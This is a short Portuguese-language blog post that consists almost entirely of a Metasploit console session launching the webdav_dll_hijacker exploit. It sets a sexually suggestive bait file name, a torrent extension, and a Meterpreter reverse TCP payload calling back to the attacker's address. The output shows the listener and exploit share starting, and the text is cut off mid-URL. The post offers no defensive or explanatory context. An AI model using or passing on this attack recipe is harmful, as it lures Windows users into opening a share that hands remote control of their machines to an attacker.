Pular para o conteúdo principal

Postagens

Mostrando postagens de maio, 2017

webdav_dll_hijacker

COMANDOS: root@bot : ~ # msfconsole -q msf > use exploit/windows/browser/webdav_dll_hijacker msf exploit( webdav_dll_hijacker ) > set EXTENSIONS torrent EXTENSIONS => torrent msf exploit( webdav_dll_hijacker ) > set SRVHOST your_ip SRVHOST => 192.168.12.198 msf exploit( webdav_dll_hijacker ) > set SHARENAME download SHARENAME => download msf exploit( webdav_dll_hijacker ) > set BASENAME gostosa_nua BASENAME => gostosa_nua msf exploit( webdav_dll_hijacker ) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit( webdav_dll_hijacker ) > set LHOST your_ip LHOST => 192.168.12.198 msf exploit( webdav_dll_hijacker ) > set LPORT 4444 LPORT => 4444 msf exploit( webdav_dll_hijacker ) > exploit [*] Exploit running as background job. [*] Started reverse TCP handler on 192.168.12.198:4444 [*] Exploit links are now available at \\192.168.12.198\download\ [*] Using URL: http://19...